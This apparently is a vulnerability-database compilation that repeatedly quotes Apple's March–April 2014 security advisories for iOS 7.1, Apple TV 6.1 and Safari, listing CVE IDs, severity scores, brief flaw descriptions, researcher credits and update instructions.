Description: A buffer overflow existed in libtiff's handling of TIFF
images. This issue was addressed through additional validation of
TIFF images.
CVE-ID
CVE-2012-2088
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted JPEG file may lead to the
disclosure of memory contents
Description: An uninitialized memory access issue existed in
libjpeg's handling of JPEG markers, resulting in the disclosure of
memory contents. This issue was addressed through additional
validation of JPEG files.
CVE-ID
CVE-2013-6629 : Michal Zalewski
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: An out of bounds memory access issue existed in the ARM
ptmx_get_ioctl function. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-1278 : evad3rs
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A configuration profile may be hidden from the user
Description: A configuration profile with a long name could be
loaded onto the device but was not displayed in the profile UI. The
issue was addressed through improved handling of profile names.
CVE-ID
CVE-2014-1282 : Assaf Hefetz, Yair Amit and Adi Sharabani of Skycure
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A person with physical access to the device may be able to
cause arbitrary code execution in kernel mode
Description: A memory corruption issue existed in the handling of
USB messages. This issue was addressed through additional validation
of USB messages.
CVE-ID
CVE-2014-1287 : Andy Davis of NCC Group
WebKit
Available for: Apple TV 2nd generation and later
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-2909 : Atte Kettunen of OUSPG
CVE-2013-2926 : cloudfuzzer
CVE-2013-2928 : Google Chrome Security Team
CVE-2013-5196 : Google Chrome Security Team
CVE-2013-5197 : Google Chrome Security Team
CVE-2013-5198 : Apple
CVE-2013-5199 : Apple
CVE-2013-5225 : Google Chrome Security Team
CVE-2013-5228 : Keen Team (@K33nTeam) working with HP's Zero Day
Initiative
CVE-2013-6625 : cloudfuzzer
CVE-2013-6635 : cloudfuzzer
CVE-2014-1269 : Apple
CVE-2014-1270 : Apple
CVE-2014-1289 : Apple
CVE-2014-1290 : ant4g0nist (SegFault) working with HP's Zero Day
Initiative, Google Chrome Security Team
CVE-2014-1291 : Google Chrome Security Team
CVE-2014-1292 : Google Chrome Security Team
CVE-2014-1293 : Google Chrome Security Team
CVE-2014-1294 : Google Chrome Security Team
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Playing a maliciously crafted video could lead to the device
becoming unresponsive
Description: A null dereference issue existed in the handling of
MPEG-4 encoded files. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2014-1280 : rg0rd
Installation note:
Apple TV will periodically check for software updates. Alternatively,
you may manually check for software updates by selecting
"Settings -> General -> Update Software".
To check the current version of software, select
"Settings -> General -> About".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
| VAR-201403-0259 | CVE-2014-1279 | Apple TV vulnerability allowing sensitive information to be obtained |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
Apple TV before 6.1 does not properly restrict logging, which allows local users to obtain sensitive information by reading log data. Apple TV is prone to a local information-disclosure vulnerability.
An attacker with physical access can exploit this issue to obtain sensitive information that may lead to further attacks.
Versions prior to Apple TV 6.1 are vulnerable. Apple TV can stream TV programs online and can also play photos, videos and music from an iPad, iPhone, iPod or PC on the TV. The vulnerability is caused by the program not properly restricting access to logs.
| VAR-201403-0256 | CVE-2014-1276 | Apple iOS vulnerability allowing user actions in arbitrary apps to be monitored |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
IOKit HID Event in Apple iOS before 7.1 allows attackers to conduct user-action monitoring attacks against arbitrary apps via a crafted app that accesses an IOKit framework interface. Apple iOS is prone to multiple vulnerabilities.
Attackers can exploit these issues to perform man-in-the-middle attack, to access arbitrary files, gain unauthorized access, bypass security restrictions, and perform other attacks. Failed attacks may cause denial-of-service conditions.
These issues affect Apple iOS versions prior to 7.1.
Note: The issue described by CVE-2013-6835 has been moved to BID 66108 (Apple iOS 'facetime-audio://' Security Bypass Vulnerability) for better documentation.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-03-10-1 iOS 7.1
iOS 7.1 is now available and addresses the following:
Backup
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A maliciously crafted backup can alter the filesystem
Description: A symbolic link in a backup would be restored, allowing
subsequent operations during the restore to write to the rest of the
filesystem. This issue was addressed by checking for symbolic links
during the restore process.
CVE-ID
CVE-2013-5133 : evad3rs
Certificate Trust Policy
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Root certificates have been updated
Description: Several certificates were added to or removed from the
list of system roots.
Configuration Profiles
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Profile expiration dates were not honored
Description: Expiration dates of mobile configuration profiles were
not evaluated correctly. The issue was resolved through improved
handling of configuration profiles.
CVE-ID
CVE-2014-1267
CoreCapture
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application can cause an unexpected system
termination
Description: A reachable assertion issue existed in CoreCapture's
handling of IOKit API calls. The issue was addressed through
additional validation of input from IOKit.
CVE-ID
CVE-2014-1271 : Filippo Bigarella
Crash Reporting
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local user may be able to change permissions on arbitrary
files
Description: CrashHouseKeeping followed symbolic links while
changing permissions on files. This issue was addressed by not
following symbolic links when changing permissions on files.
CVE-ID
CVE-2014-1272 : evad3rs
dyld
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Code signing requirements may be bypassed
Description: Text relocation instructions in dynamic libraries may
be loaded by dyld without code signature validation. This issue was
addressed by ignoring text relocation instructions.
CVE-ID
CVE-2014-1273 : evad3rs
FaceTime
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
access FaceTime contacts from the lock screen
Description: FaceTime contacts on a locked device could be exposed
by making a failed FaceTime call from the lock screen. This issue was
addressed through improved handling of FaceTime calls.
CVE-ID
CVE-2014-1274
ImageIO
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of JPEG2000
images in PDF files. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-1275 : Felix Groebert of the Google Security Team
ImageIO
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in libtiff's handling of TIFF
images. This issue was addressed through additional validation of
TIFF images.
CVE-ID
CVE-2012-2088
ImageIO
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted JPEG file may lead to the
disclosure of memory contents
Description: An uninitialized memory access issue existed in
libjpeg's handling of JPEG markers, resulting in the disclosure of
memory contents. This issue was addressed through additional
validation of JPEG files.
CVE-ID
CVE-2013-6629 : Michal Zalewski
IOKit HID Event
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may monitor user actions in other
apps
Description: An interface in the IOKit framework allowed malicious apps
to monitor user actions in other apps. This issue was addressed
through improved access control policies in the framework.
CVE-ID
CVE-2014-1276 : Min Zheng, Hui Xue, and Dr. Tao (Lenx) Wei of FireEye
iTunes Store
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A man-in-the-middle attacker may entice a user into
downloading a malicious app via Enterprise App Download
Description: An attacker with a privileged network position could
spoof network communications to entice a user into downloading a
malicious app. This issue was mitigated by using SSL and prompting
the user during URL redirects.
CVE-ID
CVE-2014-1277 : Stefan Esser
Kernel
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: An out of bounds memory access issue existed in the ARM
ptmx_get_ioctl function. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-1278 : evad3rs
Office Viewer
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Opening a maliciously crafted Microsoft Word document may
lead to an unexpected application termination or arbitrary code
execution
Description: A double free issue existed in the handling of
Microsoft Word documents. This issue was addressed through improved
memory management.
CVE-ID
CVE-2014-1252 : Felix Groebert of the Google Security Team
Photos Backend
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Deleted images may still appear in the Photos app underneath
transparent images
Description: Deleting an image from the asset library did not delete
cached versions of the image. This issue was addressed through
improved cache management.
CVE-ID
CVE-2014-1281 : Walter Hoelblinger of Hoelblinger.com, Morgan Adams,
Tom Pennington
Profiles
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A configuration profile may be hidden from the user
Description: A configuration profile with a long name could be
loaded onto the device but was not displayed in the profile UI. The
issue was addressed through improved handling of profile names.
CVE-ID
CVE-2014-1282 : Assaf Hefetz, Yair Amit and Adi Sharabani of Skycure
Safari
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: User credentials may be disclosed to an unexpected site via
autofill
Description: Safari may have autofilled user names and passwords
into a subframe from a different domain than the main frame. This
issue was addressed through improved origin tracking.
CVE-ID
CVE-2013-5227 : Niklas Malmgren of Klarna AB
Settings - Accounts
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
disable Find My iPhone without entering an iCloud password
Description: A state management issue existed in the handling of the
Find My iPhone state. This issue was addressed through improved
handling of Find My iPhone state.
CVE-ID
CVE-2014-1284
Springboard
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
see the home screen of the device even if the device has not been
activated
Description: An unexpected application termination during activation
could cause the phone to show the home screen. The issue was
addressed through improved error handling during activation.
CVE-ID
CVE-2014-1285 : Roboboi99
SpringBoard Lock Screen
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A remote attacker may be able to cause the lock screen to
become unresponsive
Description: A state management issue existed in the lock screen.
This issue was addressed through improved state management.
CVE-ID
CVE-2014-1286 : Bogdan Alecu of M-sec.net
TelephonyUI Framework
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A webpage could trigger a FaceTime audio call without user
interaction
Description: Safari did not consult the user before launching
facetime-audio:// URLs. This issue was addressed with the addition of
a confirmation prompt.
CVE-ID
CVE-2013-6835 : Guillaume Ross
USB Host
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
cause arbitrary code execution in kernel mode
Description: A memory corruption issue existed in the handling of
USB messages. This issue was addressed through additional validation
of USB messages.
CVE-ID
CVE-2014-1287 : Andy Davis of NCC Group
Video Driver
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Playing a maliciously crafted video could lead to the device
becoming unresponsive
Description: A null dereference issue existed in the handling of
MPEG-4 encoded files. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2014-1280 : rg0rd
WebKit
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-2909 : Atte Kettunen of OUSPG
CVE-2013-2926 : cloudfuzzer
CVE-2013-2928 : Google Chrome Security Team
CVE-2013-5196 : Google Chrome Security Team
CVE-2013-5197 : Google Chrome Security Team
CVE-2013-5198 : Apple
CVE-2013-5199 : Apple
CVE-2013-5225 : Google Chrome Security Team
CVE-2013-5228 : Keen Team (@K33nTeam) working with HP's Zero Day
Initiative
CVE-2013-6625 : cloudfuzzer
CVE-2013-6635 : cloudfuzzer
CVE-2014-1269 : Apple
CVE-2014-1270 : Apple
CVE-2014-1289 : Apple
CVE-2014-1290 : ant4g0nist (SegFault) working with HP's Zero Day
Initiative, Google Chrome Security Team
CVE-2014-1291 : Google Chrome Security Team
CVE-2014-1292 : Google Chrome Security Team
CVE-2014-1293 : Google Chrome Security Team
CVE-2014-1294 : Google Chrome Security Team
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "7.1".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
| VAR-201403-0254 | CVE-2014-1274 | Apple iOS FaceTime vulnerability allowing sensitive contact information to be obtained |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
FaceTime in Apple iOS before 7.1 allows physically proximate attackers to obtain sensitive FaceTime contact information by using the lock screen for an invalid FaceTime call. Apple iOS is prone to multiple vulnerabilities.
Attackers can exploit these issues to perform man-in-the-middle attack, to access arbitrary files, gain unauthorized access, bypass security restrictions, and perform other attacks. Failed attacks may cause denial-of-service conditions.
These issues affect Apple iOS versions prior to 7.1.
Note: The issue described by CVE-2013-6835 has been moved to BID 66108 (Apple iOS 'facetime-audio://' Security Bypass Vulnerability) for better documentation.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-03-10-1 iOS 7.1
iOS 7.1 is now available and addresses the following:
Backup
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A maliciously crafted backup can alter the filesystem
Description: A symbolic link in a backup would be restored, allowing
subsequent operations during the restore to write to the rest of the
filesystem. This issue was addressed by checking for symbolic links
during the restore process.
CVE-ID
CVE-2013-5133 : evad3rs
Certificate Trust Policy
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Root certificates have been updated
Description: Several certificates were added to or removed from the
list of system roots.
Configuration Profiles
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Profile expiration dates were not honored
Description: Expiration dates of mobile configuration profiles were
not evaluated correctly. The issue was resolved through improved
handling of configuration profiles.
CVE-ID
CVE-2014-1267
CoreCapture
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application can cause an unexpected system
termination
Description: A reachable assertion issue existed in CoreCapture's
handling of IOKit API calls. The issue was addressed through
additional validation of input from IOKit.
CVE-ID
CVE-2014-1271 : Filippo Bigarella
Crash Reporting
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local user may be able to change permissions on arbitrary
files
Description: CrashHouseKeeping followed symbolic links while
changing permissions on files. This issue was addressed by not
following symbolic links when changing permissions on files.
CVE-ID
CVE-2014-1272 : evad3rs
dyld
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Code signing requirements may be bypassed
Description: Text relocation instructions in dynamic libraries may
be loaded by dyld without code signature validation. This issue was
addressed by ignoring text relocation instructions.
CVE-ID
CVE-2014-1273 : evad3rs
FaceTime
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
access FaceTime contacts from the lock screen
Description: FaceTime contacts on a locked device could be exposed
by making a failed FaceTime call from the lock screen. This issue was
addressed through improved handling of FaceTime calls.
CVE-ID
CVE-2014-1274
ImageIO
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of JPEG2000
images in PDF files. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-1275 : Felix Groebert of the Google Security Team
ImageIO
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in libtiff's handling of TIFF
images. This issue was addressed through additional validation of
TIFF images.
CVE-ID
CVE-2012-2088
ImageIO
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted JPEG file may lead to the
disclosure of memory contents
Description: An uninitialized memory access issue existed in
libjpeg's handling of JPEG markers, resulting in the disclosure of
memory contents. This issue was addressed through additional
validation of JPEG files.
CVE-ID
CVE-2013-6629 : Michal Zalewski
IOKit HID Event
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may monitor user actions in other
apps
Description: An interface in the IOKit framework allowed malicious apps
to monitor user actions in other apps. This issue was addressed
through improved access control policies in the framework.
CVE-ID
CVE-2014-1276 : Min Zheng, Hui Xue, and Dr. Tao (Lenx) Wei of FireEye
iTunes Store
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A man-in-the-middle attacker may entice a user into
downloading a malicious app via Enterprise App Download
Description: An attacker with a privileged network position could
spoof network communications to entice a user into downloading a
malicious app. This issue was mitigated by using SSL and prompting
the user during URL redirects.
CVE-ID
CVE-2014-1277 : Stefan Esser
Kernel
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: An out-of-bounds memory access issue existed in the ARM
ptmx_get_ioctl function. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-1278 : evad3rs
Office Viewer
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Opening a maliciously crafted Microsoft Word document may
lead to an unexpected application termination or arbitrary code
execution
Description: A double free issue existed in the handling of
Microsoft Word documents. This issue was addressed through improved
memory management.
CVE-ID
CVE-2014-1252 : Felix Groebert of the Google Security Team
Photos Backend
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Deleted images may still appear in the Photos app underneath
transparent images
Description: Deleting an image from the asset library did not delete
cached versions of the image. This issue was addressed through
improved cache management.
CVE-ID
CVE-2014-1281 : Walter Hoelblinger of Hoelblinger.com, Morgan Adams,
Tom Pennington
Profiles
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A configuration profile may be hidden from the user
Description: A configuration profile with a long name could be
loaded onto the device but was not displayed in the profile UI. The
issue was addressed through improved handling of profile names.
CVE-ID
CVE-2014-1282 : Assaf Hefetz, Yair Amit and Adi Sharabani of Skycure
Safari
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: User credentials may be disclosed to an unexpected site via
autofill
Description: Safari may have autofilled user names and passwords
into a subframe from a different domain than the main frame. This
issue was addressed through improved origin tracking.
CVE-ID
CVE-2013-5227 : Niklas Malmgren of Klarna AB
Settings - Accounts
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
disable Find My iPhone without entering an iCloud password
Description: A state management issue existed in the handling of the
Find My iPhone state. This issue was addressed through improved
handling of Find My iPhone state.
CVE-ID
CVE-2014-1284
Springboard
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
see the home screen of the device even if the device has not been
activated
Description: An unexpected application termination during activation
could cause the phone to show the home screen. The issue was
addressed through improved error handling during activation.
CVE-ID
CVE-2014-1285 : Roboboi99
SpringBoard Lock Screen
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A remote attacker may be able to cause the lock screen to
become unresponsive
Description: A state management issue existed in the lock screen.
This issue was addressed through improved state management.
CVE-ID
CVE-2014-1286 : Bogdan Alecu of M-sec.net
TelephonyUI Framework
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A webpage could trigger a FaceTime audio call without user
interaction
Description: Safari did not consult the user before launching
facetime-audio:// URLs. This issue was addressed with the addition of
a confirmation prompt.
CVE-ID
CVE-2013-6835 : Guillaume Ross
USB Host
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
cause arbitrary code execution in kernel mode
Description: A memory corruption issue existed in the handling of
USB messages. This issue was addressed through additional validation
of USB messages.
CVE-ID
CVE-2014-1287 : Andy Davis of NCC Group
Video Driver
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Playing a maliciously crafted video could lead to the device
becoming unresponsive
Description: A null dereference issue existed in the handling of
MPEG-4 encoded files. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2014-1280 : rg0rd
WebKit
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-2909 : Atte Kettunen of OUSPG
CVE-2013-2926 : cloudfuzzer
CVE-2013-2928 : Google Chrome Security Team
CVE-2013-5196 : Google Chrome Security Team
CVE-2013-5197 : Google Chrome Security Team
CVE-2013-5198 : Apple
CVE-2013-5199 : Apple
CVE-2013-5225 : Google Chrome Security Team
CVE-2013-5228 : Keen Team (@K33nTeam) working with HP's Zero Day
Initiative
CVE-2013-6625 : cloudfuzzer
CVE-2013-6635 : cloudfuzzer
CVE-2014-1269 : Apple
CVE-2014-1270 : Apple
CVE-2014-1289 : Apple
CVE-2014-1290 : ant4g0nist (SegFault) working with HP's Zero Day
Initiative, Google Chrome Security Team
CVE-2014-1291 : Google Chrome Security Team
CVE-2014-1292 : Google Chrome Security Team
CVE-2014-1293 : Google Chrome Security Team
CVE-2014-1294 : Google Chrome Security Team
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "7.1".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
| VAR-201403-0251 | CVE-2014-1294 | WebKit in Apple iOS and Apple TV arbitrary code execution vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
WebKit, as used in Apple iOS before 7.1 and Apple TV before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than CVE-2014-1289, CVE-2014-1290, CVE-2014-1291, CVE-2014-1292, and CVE-2014-1293. WebKit, as used in Apple iOS and Apple TV, is prone to multiple memory-corruption vulnerabilities.
An attacker can exploit these issues to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
APPLE-SA-2014-04-01-1 Safari 6.1.3 and Safari 7.0.3
Safari 6.1.3 and Safari 7.0.3 are now available and address the
following:
WebKit
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.2
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-2871 : miaubiz
CVE-2013-2926 : cloudfuzzer
CVE-2013-2928 : Google Chrome Security Team
CVE-2013-6625 : cloudfuzzer
CVE-2014-1289 : Apple
CVE-2014-1290 : ant4g0nist (SegFault) working with HP's Zero Day
Initiative, Google Chrome Security Team
CVE-2014-1291 : Google Chrome Security Team
CVE-2014-1292 : Google Chrome Security Team
CVE-2014-1293 : Google Chrome Security Team
CVE-2014-1294 : Google Chrome Security Team
CVE-2014-1298 : Google Chrome Security Team
CVE-2014-1299 : Google Chrome Security Team, Apple, Renata Hodovan of
University of Szeged / Samsung Electronics
CVE-2014-1300 : Ian Beer of Google Project Zero working with HP's
Zero Day Initiative
CVE-2014-1301 : Google Chrome Security Team
CVE-2014-1302 : Google Chrome Security Team, Apple
CVE-2014-1303 : KeenTeam working with HP's Zero Day Initiative
CVE-2014-1304 : Apple
CVE-2014-1305 : Apple
CVE-2014-1307 : Google Chrome Security Team
CVE-2014-1308 : Google Chrome Security Team
CVE-2014-1309 : cloudfuzzer
CVE-2014-1310 : Google Chrome Security Team
CVE-2014-1311 : Google Chrome Security Team
CVE-2014-1312 : Google Chrome Security Team
CVE-2014-1313 : Google Chrome Security Team
CVE-2014-1713 : VUPEN working with HP's Zero Day Initiative
WebKit
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.2
Impact: An attacker running arbitrary code in the WebProcess may be
able to read arbitrary files despite sandbox restrictions
Description: A logic issue existed in the handling of IPC messages
from the WebProcess. This issue was addressed through additional
validation of IPC messages.
CVE-ID
CVE-2014-1297 : Ian Beer of Google Project Zero
For OS X Mavericks and OS X Mountain Lion systems, Safari 7.0.3
and Safari 6.1.3 may be obtained from Mac App Store.
For OS X Lion systems Safari 6.1.3 is available via the Apple
Software Update application.
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
| VAR-201403-0258 | CVE-2014-1278 | Apple iOS and Apple TV ARM kernel ptmx_get_ioctl function privilege escalation vulnerability |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
The ptmx_get_ioctl function in the ARM kernel in Apple iOS before 7.1 and Apple TV before 6.1 allows local users to gain privileges or cause a denial of service (out-of-bounds memory access and device crash) via a crafted call. Apple iOS and Apple TV are prone to multiple vulnerabilities.
Attackers can exploit these issues to execute arbitrary code, gain unauthorized access, bypass security restrictions, and perform other attacks. Failed attacks may cause denial-of-service conditions.
The following products are vulnerable:
Apple iOS versions prior to 7.1
Apple TV versions prior to 6.1.
| VAR-201403-0255 | CVE-2014-1275 | Apple iOS and Apple TV ImageIO buffer overflow vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Buffer overflow in ImageIO in Apple iOS before 7.1 and Apple TV before 6.1 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted JPEG2000 data in a PDF document. Apple iOS and Apple TV are prone to multiple vulnerabilities.
Attackers can exploit these issues to execute arbitrary code, gain unauthorized access, bypass security restrictions, and perform other attacks. Failed attacks may cause denial-of-service conditions.
The following products are vulnerable:
Apple iOS versions prior to 7.1
Apple TV versions prior to 6.1.
of USB messages.
CVE-ID
CVE-2014-1287 : Andy Davis of NCC Group
Video Driver
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Playing a maliciously crafted video could lead to the device
becoming unresponsive
Description: A null dereference issue existed in the handling of
MPEG-4 encoded files. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2014-1280 : rg0rd
WebKit
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-2909 : Atte Kettunen of OUSPG
CVE-2013-2926 : cloudfuzzer
CVE-2013-2928 : Google Chrome Security Team
CVE-2013-5196 : Google Chrome Security Team
CVE-2013-5197 : Google Chrome Security Team
CVE-2013-5198 : Apple
CVE-2013-5199 : Apple
CVE-2013-5225 : Google Chrome Security Team
CVE-2013-5228 : Keen Team (@K33nTeam) working with HP's Zero Day
Initiative
CVE-2013-6625 : cloudfuzzer
CVE-2013-6635 : cloudfuzzer
CVE-2014-1269 : Apple
CVE-2014-1270 : Apple
CVE-2014-1289 : Apple
CVE-2014-1290 : ant4g0nist (SegFault) working with HP's Zero Day
Initiative, Google Chrome Security Team
CVE-2014-1291 : Google Chrome Security Team
CVE-2014-1292 : Google Chrome Security Team
CVE-2014-1293 : Google Chrome Security Team
CVE-2014-1294 : Google Chrome Security Team
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "7.1".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
